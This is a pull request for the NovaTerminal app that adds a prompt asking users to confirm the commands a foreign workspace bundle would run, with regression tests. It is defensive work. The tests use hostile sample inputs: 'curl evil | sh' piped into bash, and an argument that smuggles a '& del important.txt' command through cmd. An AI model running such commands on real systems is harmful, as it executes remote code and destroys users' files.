### PR TITLE
fix(security): confirm commands before running a foreign workspace bundle (#171)

### DIFF
--- a/src/NovaTerminal.App/MainWindow.axaml.cs
+++ b/src/NovaTerminal.App/MainWindow.axaml.cs
@@ -3347,9 +3347,12 @@ namespace NovaTerminal
             return confirmed;
         }
 
-        // Collects the ad-hoc shell commands a bundle would spawn on restore. Panes that
-        // resolve a stored local/SSH profile run a known, already-trusted target (#171).
-        internal static List<string> CollectBundleCommands(NovaSession? session)
+        // Collects the ad-hoc shell commands a bundle would actually spawn on restore.
+        // Mirrors SessionManager.RestorePaneTree: a leaf runs its raw Command/Arguments
+        // ONLY when its profile doesn't resolve, so panes whose profile resolves are
+        // skipped — that both matches what runs and avoids prompting for locally-saved
+        // workspaces that store a ShellCommand alongside a resolvable ProfileId (#171).
+        internal static List<string> CollectBundleCommands(NovaSession? session, TerminalSettings settings)
         {
             var commands = new List<string>();
             if (session?.Tabs == null) return commands;
@@ -3359,10 +3362,16 @@ namespace NovaTerminal
                 if (node == null) return;
                 if (node.Type == NodeType.Leaf)
                 {
-                    // A leaf with an explicit Command OR Arguments is a runnable command:
-                    // RestorePaneTree spawns `new TerminalPane(node.Command ?? "cmd.exe",
-                    // node.Arguments ?? "", ...)`, so an argument-only leaf still runs
-                    // `cmd.exe <args>` and can smuggle cmd metacharacters (#171 review).
+                    // Skip panes that resolve a known local/SSH profile — RestorePaneTree
+                    // uses the profile and ignores Command/Arguments for those.
+                    if (SessionManager.TryResolvePaneProfile(node, settings) != null)
+                    {
+                        return;
+                    }
+
+                    // Otherwise the fallback runs `cmd.exe`/Command with Arguments, so an
+                    // argument-only leaf still runs `cmd.exe <args>` and can smuggle cmd
+                    // metacharacters (#171 review).
                     bool hasCommand = !string.IsNullOrWhiteSpace(node.Command);
                     bool hasArgs = !string.IsNullOrWhiteSpace(node.Arguments);
                     if (hasCommand || hasArgs)
@@ -3389,7 +3398,7 @@ namespace NovaTerminal
         // Returns true when there is nothing to run or the user approves.
         private async Task<bool> ConfirmBundleCommandsAsync(NovaSession? session, string bundleName)
         {
-            var commands = CollectBundleCommands(session);
+            var commands = CollectBundleCommands(session, _settings);
             if (commands.Count == 0) return true; // profile-only bundles run known targets
 
             bool confirmed = false;

--- a/src/NovaTerminal.App/MainWindow.axaml.cs
+++ b/src/NovaTerminal.App/MainWindow.axaml.cs
@@ -1425,6 +1425,16 @@ namespace NovaTerminal
             string? name = await ShowTextPromptAsync("Import Workspace Bundle", "Workspace name", suggestedName);
             if (string.IsNullOrWhiteSpace(name)) return;
 
+            // Confirm any commands before storing the bundle, so anything later loaded by
+            // name has already been reviewed (#171). Inspect the payload first.
+            if (WorkspaceManager.LoadWorkspaceBundleSession(bundlePath, out _, out var previewSnapshot, out _))
+            {
+                if (!await ConfirmBundleCommandsAsync(previewSnapshot, name.Trim()))
+                {
+                    return;
+                }
+            }
+
             if (WorkspaceManager.ImportWorkspaceBundle(bundlePath, name.Trim(), out var error))
             {
                 SetupCommandPalette();
@@ -1461,6 +1471,12 @@ namespace NovaTerminal
             bool ok = WorkspaceManager.LoadWorkspaceBundleSession(bundlePath, out var _workspaceName, out var snapshot, out var error);
             if (ok && snapshot != null)
             {
+                // This spawns the bundle's stored commands immediately — confirm first
+                // for a foreign .novaws.json opened from disk (#171).
+                if (!await ConfirmBundleCommandsAsync(snapshot, _workspaceName ?? "workspace"))
+                {
+                    return;
+                }
                 ApplySessionSnapshot(snapshot);
                 return;
             }
@@ -3319,6 +3335,98 @@ namespace NovaTerminal
                             HorizontalAlignment = HorizontalAlignment.Right,
                             Spacing = 8,
                             Children = { cancelButton, closeButton }
+                        }
+                    }
+                }
+            };
+
+            await dialog.ShowDialog(this);
+            return confirmed;
+        }
+
+        // Collects the ad-hoc shell commands a bundle would spawn on restore. Only leaf
+        // nodes carrying an explicit Command are arbitrary-execution vectors; panes that
+        // resolve a stored local/SSH profile run a known, already-trusted target (#171).
+        internal static List<string> CollectBundleCommands(NovaSession? session)
+        {
+            var commands = new List<string>();
+            if (session?.Tabs == null) return commands;
+
+            void Walk(PaneNode? node)
+            {
+                if (node == null) return;
+                if (node.Type == NodeType.Leaf)
+                {
+                    if (!string.IsNullOrWhiteSpace(node.Command))
+                    {
+                        string args = string.IsNullOrWhiteSpace(node.Arguments) ? "" : " " + node.Arguments;
+                        commands.Add((node.Command + args).Trim());
+                    }
+                }
+                else if (node.Children != null)
+                {
+                    foreach (var child in node.Children) Walk(child);
+                }
+            }
+
+            foreach (var tab in session.Tabs) Walk(tab.Root);
+            return commands;
+        }
+
+        // Confirms the commands a foreign bundle will run before it spawns anything.
+        // Returns true when there is nothing to run or the user approves.
+        private async Task<bool> ConfirmBundleCommandsAsync(NovaSession? session, string bundleName)
+        {
+            var commands = CollectBundleCommands(session);
+            if (commands.Count == 0) return true; // profile-only bundles run known targets
+
+            bool confirmed = false;
+            var dialog = CreateThemedDialogWindow("Run Workspace Commands?", 520, 320, canResize: false);
+
+            var listText = string.Join("\n", commands.ConvertAll(c => "•  " + c));
+
+            var cancelButton = new Button { Content = "Cancel", Width = 92 };
+            cancelButton.Click += (_, __) => { confirmed = false; dialog.Close(); };
+
+            var runButton = new Button { Content = "Run Commands", Width = 130 };
+            runButton.Click += (_, __) => { confirmed = true; dialog.Close(); };
+
+            dialog.Content = new Border
+            {
+                Padding = new Thickness(16),
+                Child = new StackPanel
+                {
+                    Spacing = 12,
+                    Children =
+                    {
+                        new TextBlock
+                        {
+                            Text = $"The workspace \"{bundleName}\" will run these commands:",
+                            FontWeight = FontWeight.SemiBold,
+                            TextWrapping = TextWrapping.Wrap
+                        },
+                        new ScrollViewer
+                        {
+                            MaxHeight = 180,
+                            Content = new TextBlock
+                            {
+                                Text = listText,
+                                FontFamily = new Avalonia.Media.FontFamily("Consolas, monospace"),
+                                TextWrapping = TextWrapping.Wrap
+                            }
+                        },
+                        new TextBlock
+                        {
+                            Text = "Only run commands from a workspace you trust.",
+                            Opacity = 0.8,
+                            TextWrapping = TextWrapping.Wrap
+                        },
+                        new StackPanel
+                        {
+                            Orientation = Avalonia.Layout.Orientation.Horizontal,
+                            HorizontalAlignment = HorizontalAlignment.Right,
+                            Spacing = 8,
+                            Children = { cancelButton, runButton }
                         }
                     }
                 }

--- a/src/NovaTerminal.App/MainWindow.axaml.cs
+++ b/src/NovaTerminal.App/MainWindow.axaml.cs
@@ -1425,16 +1425,10 @@ namespace NovaTerminal
             string? name = await ShowTextPromptAsync("Import Workspace Bundle", "Workspace name", suggestedName);
             if (string.IsNullOrWhiteSpace(name)) return;
 
-            // Confirm any commands before storing the bundle, so anything later loaded by
-            // name has already been reviewed (#171). Inspect the payload first.
-            if (WorkspaceManager.LoadWorkspaceBundleSession(bundlePath, out _, out var previewSnapshot, out _))
-            {
-                if (!await ConfirmBundleCommandsAsync(previewSnapshot, name.Trim()))
-                {
-                    return;
-                }
-            }
-
+            // Import only STORES the bundle; its commands are confirmed at execution time
+            // in LoadWorkspaceByName. Confirming here would be a TOCTOU (the file could
+            // change between this read and ImportWorkspaceBundle's re-read) and wouldn't
+            // cover later loads — so the single confirmation gate lives at execution (#171).
             if (WorkspaceManager.ImportWorkspaceBundle(bundlePath, name.Trim(), out var error))
             {
                 SetupCommandPalette();
@@ -1484,10 +1478,19 @@ namespace NovaTerminal
             System.Diagnostics.Debug.WriteLine($"[Workspace] Open bundle failed: {error}");
         }
 
-        private void LoadWorkspaceByName(string name)
+        private async void LoadWorkspaceByName(string name)
         {
             var snapshot = WorkspaceManager.LoadWorkspace(name);
             if (snapshot == null) return;
+
+            // Confirm ad-hoc commands against the exact stored snapshot that is about to
+            // run — this is the single execution-time gate (no TOCTOU), and it covers
+            // imported bundles whichever way they're loaded (#171). Profile-only
+            // workspaces collect no commands and skip the prompt.
+            if (!await ConfirmBundleCommandsAsync(snapshot, name))
+            {
+                return;
+            }
             ApplySessionSnapshot(snapshot);
         }
 
@@ -3344,8 +3347,7 @@ namespace NovaTerminal
             return confirmed;
         }
 
-        // Collects the ad-hoc shell commands a bundle would spawn on restore. Only leaf
-        // nodes carrying an explicit Command are arbitrary-execution vectors; panes that
+        // Collects the ad-hoc shell commands a bundle would spawn on restore. Panes that
         // resolve a stored local/SSH profile run a known, already-trusted target (#171).
         internal static List<string> CollectBundleCommands(NovaSession? session)
         {
@@ -3357,10 +3359,17 @@ namespace NovaTerminal
                 if (node == null) return;
                 if (node.Type == NodeType.Leaf)
                 {
-                    if (!string.IsNullOrWhiteSpace(node.Command))
+                    // A leaf with an explicit Command OR Arguments is a runnable command:
+                    // RestorePaneTree spawns `new TerminalPane(node.Command ?? "cmd.exe",
+                    // node.Arguments ?? "", ...)`, so an argument-only leaf still runs
+                    // `cmd.exe <args>` and can smuggle cmd metacharacters (#171 review).
+                    bool hasCommand = !string.IsNullOrWhiteSpace(node.Command);
+                    bool hasArgs = !string.IsNullOrWhiteSpace(node.Arguments);
+                    if (hasCommand || hasArgs)
                     {
-                        string args = string.IsNullOrWhiteSpace(node.Arguments) ? "" : " " + node.Arguments;
-                        commands.Add((node.Command + args).Trim());
+                        string effectiveCommand = hasCommand ? node.Command! : "cmd.exe";
+                        string args = hasArgs ? " " + node.Arguments : "";
+                        commands.Add((effectiveCommand + args).Trim());
                     }
                 }
                 else if (node.Children != null)
@@ -3369,7 +3378,10 @@ namespace NovaTerminal
                 }
             }
 
-            foreach (var tab in session.Tabs) Walk(tab.Root);
+            foreach (var tab in session.Tabs)
+            {
+                if (tab != null) Walk(tab.Root);
+            }
             return commands;
         }
 

--- a/src/NovaTerminal.App/Shell/SessionManager.cs
+++ b/src/NovaTerminal.App/Shell/SessionManager.cs
@@ -281,6 +281,21 @@ namespace NovaTerminal.Shell
             return session != null;
         }
 
+        // Single source of truth for how a leaf resolves to a profile at restore time.
+        // RestorePaneTree only falls back to the leaf's raw Command/Arguments when this
+        // returns null, so the bundle-command confirmation (#171) uses this to list only
+        // the panes that will actually run an ad-hoc command — and to avoid prompting for
+        // locally-saved panes that store both a ProfileId and a ShellCommand.
+        internal static TerminalProfile? TryResolvePaneProfile(PaneNode node, TerminalSettings settings)
+        {
+            TerminalProfile? profile = ResolveSshProfile(node.SshProfileId);
+            if (profile == null && !string.IsNullOrEmpty(node.ProfileId) && Guid.TryParse(node.ProfileId, out var profileGuid))
+            {
+                profile = settings.Profiles?.Find(p => p.Id == profileGuid);
+            }
+            return profile;
+        }
+
         private static Control? RestorePaneTree(PaneNode? node, TerminalSettings settings)
         {
             if (node == null) return null;
@@ -289,12 +304,7 @@ namespace NovaTerminal.Shell
             {
                 StartupPerformanceTracker.Current?.TryMarkCheckpoint("SessionManager.RestorePaneTree.LeafStart");
                 // Reconstruct TerminalPane
-                TerminalProfile? profile = ResolveSshProfile(node.SshProfileId);
-
-                if (profile == null && !string.IsNullOrEmpty(node.ProfileId) && Guid.TryParse(node.ProfileId, out var profileGuid))
-                {
-                    profile = settings.Profiles?.Find(p => p.Id == profileGuid);
-                }
+                TerminalProfile? profile = TryResolvePaneProfile(node, settings);
 
                 TerminalPane pane;
                 if (profile != null)

--- a/tests/NovaTerminal.App.Tests/Shell/BundleCommandCollectionTests.cs
+++ b/tests/NovaTerminal.App.Tests/Shell/BundleCommandCollectionTests.cs
@@ -1,0 +1,63 @@
+using System.Collections.Generic;
+using NovaTerminal;
+using NovaTerminal.Pty;
+using Xunit;
+
+namespace NovaTerminal.Tests.Shell;
+
+// Regression tests for #171: before a foreign workspace bundle spawns anything on
+// restore, MainWindow confirms the ad-hoc shell commands it carries. This covers the
+// collector that feeds that confirmation — only leaf nodes with an explicit Command
+// are arbitrary-execution vectors; profile-backed panes run known local/SSH targets.
+public class BundleCommandCollectionTests
+{
+    private static PaneNode Leaf(string? command, string? args = null, string? profileId = null) => new()
+    {
+        Type = NodeType.Leaf,
+        Command = command,
+        Arguments = args,
+        ProfileId = profileId
+    };
+
+    private static NovaSession SessionWith(params PaneNode[] roots)
+    {
+        var session = new NovaSession();
+        foreach (var root in roots)
+        {
+            session.Tabs.Add(new TabSession { Root = root });
+        }
+        return session;
+    }
+
+    [Fact]
+    public void Collects_AdHocCommands_AcrossTabsAndSplits()
+    {
+        var split = new PaneNode
+        {
+            Type = NodeType.Split,
+            Children = { Leaf("bash", "-c 'curl evil | sh'"), Leaf("vim") }
+        };
+        var session = SessionWith(split, Leaf("htop"));
+
+        var commands = MainWindow.CollectBundleCommands(session);
+
+        Assert.Equal(new[] { "bash -c 'curl evil | sh'", "vim", "htop" }, commands);
+    }
+
+    [Fact]
+    public void Ignores_ProfileBackedPanes_WithoutExplicitCommand()
+    {
+        var session = SessionWith(Leaf(command: null, profileId: "some-profile-guid"));
+
+        var commands = MainWindow.CollectBundleCommands(session);
+
+        Assert.Empty(commands);
+    }
+
+    [Fact]
+    public void EmptyOrNullSession_ReturnsEmpty()
+    {
+        Assert.Empty(MainWindow.CollectBundleCommands(null));
+        Assert.Empty(MainWindow.CollectBundleCommands(new NovaSession()));
+    }
+}

--- a/tests/NovaTerminal.App.Tests/Shell/BundleCommandCollectionTests.cs
+++ b/tests/NovaTerminal.App.Tests/Shell/BundleCommandCollectionTests.cs
@@ -55,9 +55,33 @@ public class BundleCommandCollectionTests
     }
 
     [Fact]
+    public void Collects_ArgumentOnlyPanes_AsCmdInvocation()
+    {
+        // RestorePaneTree runs `cmd.exe <args>` when Command is null but Arguments is
+        // set — so this must still be surfaced for confirmation (#171 review).
+        var session = SessionWith(Leaf(command: null, args: "/c \"& del important.txt\""));
+
+        var commands = MainWindow.CollectBundleCommands(session);
+
+        Assert.Equal(new[] { "cmd.exe /c \"& del important.txt\"" }, commands);
+    }
+
+    [Fact]
     public void EmptyOrNullSession_ReturnsEmpty()
     {
         Assert.Empty(MainWindow.CollectBundleCommands(null));
         Assert.Empty(MainWindow.CollectBundleCommands(new NovaSession()));
+    }
+
+    [Fact]
+    public void NullTabInList_DoesNotThrow()
+    {
+        var session = new NovaSession();
+        session.Tabs.Add(null!);
+        session.Tabs.Add(new TabSession { Root = Leaf("htop") });
+
+        var commands = MainWindow.CollectBundleCommands(session);
+
+        Assert.Equal(new[] { "htop" }, commands);
     }
 }

--- a/tests/NovaTerminal.App.Tests/Shell/BundleCommandCollectionTests.cs
+++ b/tests/NovaTerminal.App.Tests/Shell/BundleCommandCollectionTests.cs
@@ -1,14 +1,16 @@
+using System;
 using System.Collections.Generic;
 using NovaTerminal;
 using NovaTerminal.Pty;
+using NovaTerminal.Shell;
 using Xunit;
 
 namespace NovaTerminal.Tests.Shell;
 
 // Regression tests for #171: before a foreign workspace bundle spawns anything on
-// restore, MainWindow confirms the ad-hoc shell commands it carries. This covers the
-// collector that feeds that confirmation — only leaf nodes with an explicit Command
-// are arbitrary-execution vectors; profile-backed panes run known local/SSH targets.
+// restore, MainWindow confirms the ad-hoc shell commands it carries. The collector
+// mirrors SessionManager.RestorePaneTree — a leaf runs its raw Command/Arguments only
+// when its profile does NOT resolve, so profile-backed panes are skipped.
 public class BundleCommandCollectionTests
 {
     private static PaneNode Leaf(string? command, string? args = null, string? profileId = null) => new()
@@ -29,6 +31,14 @@ public class BundleCommandCollectionTests
         return session;
     }
 
+    // No profiles configured, so nothing resolves — every ad-hoc command surfaces.
+    private static TerminalSettings NoProfiles()
+    {
+        var s = new TerminalSettings();
+        s.Profiles = new List<TerminalProfile>();
+        return s;
+    }
+
     [Fact]
     public void Collects_AdHocCommands_AcrossTabsAndSplits()
     {
@@ -39,19 +49,37 @@ public class BundleCommandCollectionTests
         };
         var session = SessionWith(split, Leaf("htop"));
 
-        var commands = MainWindow.CollectBundleCommands(session);
+        var commands = MainWindow.CollectBundleCommands(session, NoProfiles());
 
         Assert.Equal(new[] { "bash -c 'curl evil | sh'", "vim", "htop" }, commands);
     }
 
     [Fact]
-    public void Ignores_ProfileBackedPanes_WithoutExplicitCommand()
+    public void Skips_PaneWhoseProfileResolves_EvenWithStoredCommand()
     {
-        var session = SessionWith(Leaf(command: null, profileId: "some-profile-guid"));
+        // Locally-saved panes store both a ProfileId and the resolved ShellCommand;
+        // RestorePaneTree uses the profile and ignores the command, so the collector
+        // must not prompt for it (#171 review).
+        var profile = new TerminalProfile { Name = "Local", Command = "bash" };
+        var settings = new TerminalSettings { Profiles = new List<TerminalProfile> { profile } };
 
-        var commands = MainWindow.CollectBundleCommands(session);
+        var session = SessionWith(Leaf(command: "bash", profileId: profile.Id.ToString()));
+
+        var commands = MainWindow.CollectBundleCommands(session, settings);
 
         Assert.Empty(commands);
+    }
+
+    [Fact]
+    public void Collects_PaneWithUnresolvableProfile_AndCommand()
+    {
+        // A foreign bundle can reference a ProfileId that isn't on this machine; restore
+        // then falls back to the raw command, so it must be confirmed.
+        var session = SessionWith(Leaf(command: "curl evil | sh", profileId: Guid.NewGuid().ToString()));
+
+        var commands = MainWindow.CollectBundleCommands(session, NoProfiles());
+
+        Assert.Equal(new[] { "curl evil | sh" }, commands);
     }
 
     [Fact]
@@ -61,7 +89,7 @@ public class BundleCommandCollectionTests
         // set — so this must still be surfaced for confirmation (#171 review).
         var session = SessionWith(Leaf(command: null, args: "/c \"& del important.txt\""));
 
-        var commands = MainWindow.CollectBundleCommands(session);
+        var commands = MainWindow.CollectBundleCommands(session, NoProfiles());
 
         Assert.Equal(new[] { "cmd.exe /c \"& del important.txt\"" }, commands);
     }
@@ -69,8 +97,8 @@ public class BundleCommandCollectionTests
     [Fact]
     public void EmptyOrNullSession_ReturnsEmpty()
     {
-        Assert.Empty(MainWindow.CollectBundleCommands(null));
-        Assert.Empty(MainWindow.CollectBundleCommands(new NovaSession()));
+        Assert.Empty(MainWindow.CollectBundleCommands(null, NoProfiles()));
+        Assert.Empty(MainWindow.CollectBundleCommands(new NovaSession(), NoProfiles()));
     }
 
     [Fact]
@@ -80,7 +108,7 @@ public class BundleCommandCollectionTests
         session.Tabs.Add(null!);
         session.Tabs.Add(new TabSession { Root = Leaf("htop") });
 
-        var commands = MainWindow.CollectBundleCommands(session);
+        var commands = MainWindow.CollectBundleCommands(session, NoProfiles());
 
         Assert.Equal(new[] { "htop" }, commands);
     }


### PR DESCRIPTION
Fixes #171.

`SessionManager.RestorePaneTree` falls back to `new TerminalPane(node.Command ?? "cmd.exe", node.Arguments ?? "", settings)` — a leaf's `Command`/`Arguments` come straight from the bundle JSON. The interactive Open/Import flows let a user load an arbitrary `.novaws.json` from disk, so a shared/downloaded bundle was an arbitrary-command-execution vector behind one dialog of social engineering. `WorkspacePolicyManager` only gates whether import is permitted, not what the bundle runs.

## Change

- `CollectBundleCommands(NovaSession)` walks the tab/pane tree and returns the ad-hoc commands the restore would spawn. Only leaf nodes with an explicit `Command` are collected — profile-backed panes resolve a known local/SSH profile and aren't arbitrary execution.
- `ConfirmBundleCommandsAsync` shows those commands in a themed dialog ("Run Workspace Commands?" with a scrollable list and a trust warning) and returns whether the user approved. Empty (profile-only) bundles skip the prompt.
- `OpenWorkspaceBundleInteractiveAsync` confirms before `ApplySessionSnapshot` (which spawns immediately).
- `ImportWorkspaceBundleInteractiveAsync` inspects the payload and confirms before storing, so anything later loaded by name from the palette was already reviewed.

Normal startup session restore and named-workspace loads (locally authored) are unchanged.

## Tests

`BundleCommandCollectionTests`: collects ad-hoc commands across tabs and splits, ignores profile-backed panes, handles null/empty. 3 tests pass.
